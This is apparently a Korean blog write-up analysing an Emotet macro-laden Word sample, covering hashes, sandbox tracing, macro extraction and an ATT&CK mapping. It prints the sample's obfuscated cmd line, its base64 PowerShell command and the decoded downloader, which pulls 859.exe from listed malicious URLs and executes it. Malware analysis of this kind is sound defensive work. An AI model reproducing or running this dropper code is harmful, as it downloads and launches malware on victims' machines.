Malware sample(Emotet) Analysis
1. 분석파일 & 분석환경
분석파일
- 파일명: 2c56c3a464728d07356992b8a9105fea2a9321e2572ddf18db89a74aed4e8c1f.doc
- 파일타입: Microsoft Compound(MS Office 97-2003 or MSI etc.)
- 파일크기: 92KB
- 파일해시값
- MD5: 4ECD8072C33A82275D9AB3678E6457CB
- SHA1: 7DE95CB762EB9A6C0911D054FC4ADAB529185F41
- SHA256: 2C56C3A464728D07356992B8A9105FEA2A9321E2572DDF18DB89A74AED4E8C1F
분석환경
- Virtual Machine: Windows10 Pro 64bit , Office 2013
2. 파일 실행 분석
매크로 실행 전
- 샘플파일을 더블 클릭하여 Word문서를 열면,
문서 안에 매크로를 포함
하고 있는 것을 알 수 있음
매크로 실행 후
- Process hacker, Process Monitor, WireShark를 실행 한 상태에서 매크로 실행 후 살펴보기
- Word 문서의 "Enable Content" 버튼을 클릭하여 매크로를 실행
- Command Line을 이용하여 powershell을 실행하고 있음을 알 수 있음
- Process Monitor로 프로세스 실행, 종료 확인
- process 실행, 종료만 필터링
- cmd.exe, powershell.exe가 실행 되나 command는 난독화된 상태
- cmd.exe command
"C:\Windows\System32\cmd.exe" /v:^on^ ^ ^ /r"s^e^T ^ ^X^H^=^pow^er(0e^ll^ -^e^ ^J^:B^E:H^I^:^Sw^:9:G{^:Z^,^B3^:C^#:bwBi^:^G^o^:Z,B^4^:H,^:^I:^B.^:^GU^:d^:^:/^:^Fq:Z^,Bi:^E;:b^:Bp:G^U:^bgB#:D(:^J:^B^L:^H^Y^:,g^:^9^:Cq^:a^:B#^:H^,:q:^:^6:C8^:^L^wBk^:Gk:Z^wB^p:^H,^:Y,^B(:C{^:^Z,B#^:^G{^:^Y,Bz^:G8:^Z^g^B^#^:C^{^:^Z,B^1:C^8:Uw^B:^:Gg^:d:B#^:H::^.^g^:v^:C8^:^q^wBv^:G^;:^a^,^Bv^:^G^#:Y,B2^:^G^U:^bg^:/^:G;^:bwB^t^:C^8:^d^,^B0:G(:^S^g^:#^:^E:^:^a^:^B^#^:H^,^:q^::6^:C^8:L^wBp:H;:bw^B4:^Gk:^Y^,^B(:G^k^:^d^:B^l:H^;^:^Lg^B4:G8^:b^,^:/:G^{^:^Z^w:v:^D^;:^a:B;^:H^g^:V^,B^1:G^,^:NwB^:^:^G^g^:^d:^B#:^H::.g:v^:C8^:b^,Bv^:H^Y^:^Z,^Bp:H^;:Z^wBv^:^G,:b^w^B^p^:C{:^Yw^Bv:^G^#:^L^g^Bi^:^HI^:L^w^B^Z^:H^I^:R^,:^z:D^I^:Vw^BN^:^E^,^:^,:B^o^:H^,^:^d:^B^w^:^D^o^:L^w^:v^:^G^{:a,B2:G^E:qwBp:C^{^:a^,B/:C^8^:Uw:^`:C{:^UwB^w:^Gw:^a^,^B^#:Cg^:^Jw^B:^:Cq^:^K,^:^7:C,:Z^gB3:H^o:^I^:^:9:C:^:^Jw:^{^:^D^U:.,:^`^:^D(:J:B^I:E{^:q^::9:C,^:^Z,B/:HY:^.^gB^w^:H^U:Y^gB(:Gk:^Yw:r^:Cq:^X^:^:^`:C(:^J:^Bm:H^q^:^eg:r:Cq:LgB^l:H^g:^Z^,^:`:^D(^:ZgBv^:HI^:^Z,^B0^:G;:^a^:^:o:C,:V^gB^3^:G^g:I^:Bp^:G{^:I^::^k^:E(^:d^gBC:Ck^:^ewB#^:^HI^:e,^B^7^:C^,^:R^:^B^$:E(^:L^g^BE:^G8^:^d^wB/:^Gw^:bwB0^:G^,:R^gBp^:^Gw^:Z^,:o^:C^,:V^gB3^:Gg^:^L::g^:C,^:^S:B^.^:H^::K^,:^7:^E^k^:^bgB2:^G8^:a^w^B^l:C#:^S^,^B#^:GU^:b^,^:g:C^,^:S^:B.^:H:^:.wB^i^:^HI:Z,^B0:^G(:^.wB9:^G;:Y^,^B^#^:G;:a:B^7^:^H#:^f^,:g:C:^:I::^g:C^:^:^I::g^:C^::^I^:^:g:C::I^:^:^g^:C:^:I::g^:C^::& s^e^T ^ ^H^q=!^XH^:^q=c!&&S^E^T ^43^G=^!^H^q^:^0^=h!&& s^Et ^ ^ ^ k^ePY=^!^4^3^G^:`^=n^!&& s^e^T ^L^G0=!^k^e^P^Y^:$=^y!&& se^t ^ ^ ^7M1^S=^!^L^G0^:^4^=^j!& S^E^t ^ c^KmC=^!^7M^1^S:(^=s!&s^E^T ^ ^ v^B^6^a=!c^K^mC^:^,=^Q^!&&s^Et ^ ^ ^ A^j^p=!v^B^6^a:.=^O^!&& s^eT ^ ^ Vn=^!^A^j^p^:^:^=^A!&se^t ^ ^ ^Y^a=!Vn:^#^=^0!&& SE^T NCt=^!^Y^a:^{^=^4^!&& SE^T ^gn0^9=^!NC^t:/^=^u!& s^et ^ ^ ^EH=^!^gn^0^9^:;^=^M^!&C^A^L^l %^EH% "
- powershell.exe command
-
powershell -e JABEAHIASwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABLAHYAQgA9ACcAaAB0AHQAcAA6AC8ALwBkAGkAZwBpAHQAYQBsAC4AZQB0AG4AYQBzAG8AZgB0AC4AZQB1AC8AUwBAAGgAdAB0AHAAOgAvAC8AcwBvAGMAaQBvAG0AYQB2AGUAbgAuAGMAbwBtAC8AdQBhAGsASgA0AEAAaAB0AHQAcAA6AC8ALwBpAHMAbwBjAGkAYQBsAGkAdABlAHMALgBjAG8AbQAuAG4AZwAvADMAaABMAHgAVQB1AGQANwBAAGgAdAB0AHAAOgAvAC8AbQBvAHYAZQBpAHMAZwBvAGQAbwBpAC4AYwBvAG0ALgBiAHIALwBZAHIARQAzADIAVwBNAEQAQABoAHQAdABwADoALwAvAG4AaQB2AGEAcwBpAC4AaQBuAC8AUwAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAZgB3AHoAIAA9ACAAJwA4ADUAOQAnADsAJABIAE4AcAA9ACQAZQBuAHYAOgBwAHUAYgBsAGkAYwArACcAXAAnACsAJABmAHcAegArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQAVgB3AGgAIABpAG4AIAAkAEsAdgBCACkAewB0AHIAeQB7ACQARAByAEsALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVgB3AGgALAAgACQASABOAHAAKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQASABOAHAAOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0AfQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA
- Wireshark 실행 후 네트워크 연결 확인
- http.request or dns필터링
- Network Connection
- http.request or dns필터링
Dst.IP | URI | Protocol | Status |
91.230.192.105 | digital.etnasoft.eu/S | HTTP | 404 Not Found |
148.66.136.60 | sociomaven.com/uakJ4 | HTTP | 404 Not Found |
ip not found | isocialites.com.ng | DNS | |
ip not fonund | moveisgodoi.com.br | DNS | |
166.162.27.151 | http://nivasi.in/S | HTTP | 404 Not Found |
3. 분석
매크로 확인, 추출
oletools
를 이용하여 확인- -t: triage mode
- M: Macros, A: Auto-executalbe, S: Supicious keywords, H: Hex strings, B: Base64 strings
- M: Macros, A: Auto-executalbe, S: Supicious keywords, H: Hex strings, B: Base64 strings
- -t: triage mode
- 의심스러운 부분 출력(-d option)
oledump
를 이용하여 매크로 확인 또는- 총 3개의 매크로, VBA 스크립트를 포함(8, 9, 16)
- 총 3개의 매크로, VBA 스크립트를 포함(8, 9, 16)
- 매크로 추출, 저장
- 매크로 분석
- 추출한 매크로 파일을 분석 또는 추출하지 않고 word에 포함되어 있는 [view]-[Macro]를 이용해서 분석해도 됨
- AutoOpen()부터 분석 시작 → 분석하지 않음
- 추출한 매크로 파일을 분석 또는 추출하지 않고 word에 포함되어 있는 [view]-[Macro]를 이용해서 분석해도 됨
Command Line 분석
- powershell 실행 스크립트: 상세 분석하지 않음
Powershell Command 분석
- powershell.exe -e 이후의 문자열에 대해 Base64 Decoding → Null Byte 제거→';'문자를 ';\n'로 변경 후 분석
- Drop file을 다운로드 하기 위한 URI, 파일명, 다운로드 경로가 포함
-
$DrK=new-object Net.WebClient; $KvB='http://digital.etnasoft.eu/S@http://sociomaven.com/uakJ4@http://isocialites.com.ng/3hLxUud7@http://moveisgodoi.com.br/YrE32WMD@http://nivasi.in/S'.Split('@'); $fwz = '859'; $HNp=$env:public+'\'+$fwz+'.exe'; foreach($Vwh in $KvB){try{$DrK.DownloadFile($Vwh, $HNp); Invoke-Item $HNp; break; }catch{}}
- $KvB에 접속 URL이 있는 것을 볼 수 있음: '@' 문자 기준으로 split
- $HNp에서 파일 다운로드 경로 지정: public 환경변수의 경로에 '859.exe' 다운로드
- 분석환경에서 public 환경 변수의 경로: c:\users\Public
- 현재 C2 서버가 모두 접속 불가로 실제 다운로드, 실행은 되지 않음
4. MITRE ATT&CK 분석
MITRE ATT&CK 사이트 접속
- MITRE ATT&CK 사이트 URL: https://attack.mitre.org
Emotet
키워드로 검색 후 살펴보기
- Emotet
- ID: S0367
- TrikBot, IceID 같은 멀웨어의 다운로더로 사용되는 멀웨어, 2014년 6월 처음 등장, 주로 은행을 타겟
- Infection Chain(TREND MICRO Exploring Emotet'sActivities 참조)
활용되는 기술들
- 실행 및 분석으로는 Execution 카테고리의 기술만 살펴 볼 수 있음
'보안 > Analysis' 카테고리의 다른 글
Lena's Reversing for Newbies #02 (0) | 2018.08.28 |
---|---|
Lena's Reversing for Newbies #01 (0) | 2018.08.26 |